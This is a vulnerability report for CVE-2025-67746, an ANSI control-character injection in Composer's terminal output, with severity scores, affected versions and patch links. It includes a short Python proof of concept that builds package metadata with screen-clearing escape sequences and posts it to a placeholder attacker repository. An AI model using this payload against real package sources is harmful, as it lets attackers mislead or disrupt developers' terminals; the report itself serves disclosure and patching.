Security Vulnerability Report
CVE-2025-67746 CVSS 4.3 MEDIUM

Published: 2025-12-30 16:15:47
Last Modified: 2026-02-25 14:54:31

Description

Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters in the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this has thus a low severity but we still publish a CVE as it has potential for abuse, and we want to be on the safe side informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* - VULNERABLE (Composer 2.0.0 <= version < 2.2.26)
cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* - VULNERABLE (Composer 2.3.0 <= version < 2.9.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Example of a malicious ANSI escape sequence.
# An attacker could inject ANSI control characters into a package description.
malicious_payload = "\033[2J\033[H"   # clear screen, cursor to home
malicious_payload += "\033[31m"       # red text
malicious_payload += "Malicious Content"
malicious_payload += "\033[0m"        # reset attributes

# Full PoC script


def create_malicious_package():
    # Build package metadata containing the malicious ANSI escape sequences
    payload = {
        "name": "evil/package",
        "description": "\033[2J\033[H" + " " * 10000 + "Hacked!",
        "version": "1.0.0",
    }
    # Upload it to the attacker-controlled Composer repository (placeholder host)
    response = requests.post(
        "http://malicious-repo.example.com/packages",
        json=payload,
        timeout=10,
    )
    return response.status_code == 200


def exploit():
    if create_malicious_package():
        print("Malicious package created successfully")
    else:
        print("Failed to create malicious package")


if __name__ == "__main__":
    exploit()

References

https://github.com/composer/composer/commit/1d40a95c9d39a6b7f80d404ab30336c586da9917 (Patch)
https://github.com/composer/composer/commit/5db1876a76fdef76d3c4f8a27995c434c7a43e71 (Patch)
https://github.com/composer/composer/releases/tag/2.2.26 (Product, Release Notes)
https://github.com/composer/composer/releases/tag/2.9.3 (Product, Release Notes)
https://github.com/composer/composer/security/advisories/GHSA-59pp-r3rg-353g (Security Advisory)

Weakness: CWE-74